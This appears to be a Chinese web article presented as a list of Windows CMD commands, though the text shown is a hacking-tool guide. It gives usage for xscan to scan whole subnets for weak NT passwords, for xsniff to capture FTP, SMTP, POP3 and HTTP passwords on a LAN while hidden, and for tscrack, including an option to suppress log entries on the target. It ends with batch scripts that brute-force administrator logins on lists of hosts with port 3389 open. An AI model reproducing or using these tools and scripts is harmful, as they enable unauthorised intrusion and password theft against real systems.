Windows CMD命令大全(值得收藏)

2019-09-19 06:36:31王冬梅

  xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机

  xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机

  九:

  命令行方式嗅探器: xsniff.exe

  可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

  参数说明

  -tcp 输出TCP数据报

  -udp 输出UDP数据报

  -icmp 输出ICMP数据报

  -pass 过滤密码信息

  -hide 后台运行

  -host 解析主机名

  -addr IP地址 过滤IP地址

  -port 端口 过滤端口

  -log 文件名 将输出保存到文件

  -asc 以ASCII形式输出

  -hex 以16进制形式输出

  用法示例

  xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

  xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

  终端服务密码破解: tscrack.exe

  参数说明

  -h 显示使用帮助

  -v 显示版本信息

  -s 在屏幕上打出解密能力

  -b 密码错误时发出的声音

  -t 同是发出多个连接(多线程)

  -N Prevent System Log entries on targeted server

  -U 卸载移除tscrack组件

  -f 使用-f后面的密码

  -F 间隔时间(频率)

  -l 使用-l后面的用户名

  -w 使用-w后面的密码字典

  -p 使用-p后面的密码

  -D 登录主页面

  用法示例

  tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码

  tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户

  @if not exist ipcscan.txt goto noscan

  @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

  nscan

  @echo 3389.txt no find or scan faild

  (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)

  3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat

  @if not exist tscrack.exe goto noscan

  @tscrack %1 -l administrator -w pass.dic >>rouji.txt

  :noscan

  @echo tscrack.exe no find or scan faild

  (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)

相关文章 大家在看